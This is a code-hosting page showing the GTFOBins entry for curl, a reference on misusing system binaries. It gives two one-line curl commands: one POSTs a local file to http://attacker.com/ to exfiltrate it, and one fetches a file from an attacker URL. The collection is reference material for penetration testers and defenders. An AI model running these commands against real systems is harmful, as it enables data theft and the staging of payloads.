This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
b457967d07de7e1bd1a212c08f295dfb8bbdb33f
GTFOBins.github.io
/
_gtfobins
/
curl.md
Emilio Pinna
b06bb08f96
Fix description
2018-05-25 18:57:26 +01:00
457 B
Raw
Blame
History
functions
functions
upload
download
description
code
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
URL=
http://attacker.com/
LFILE=file_to_send curl -X POST -d @$file_to_send $URL
description
code
Fetch a remote file via HTTP GET request.
URL=
http://attacker.com/file_to_get
LFILE=where_to_save curl $URL -o $LFILE
Reference in New Issue
View Git Blame
Copy Permalink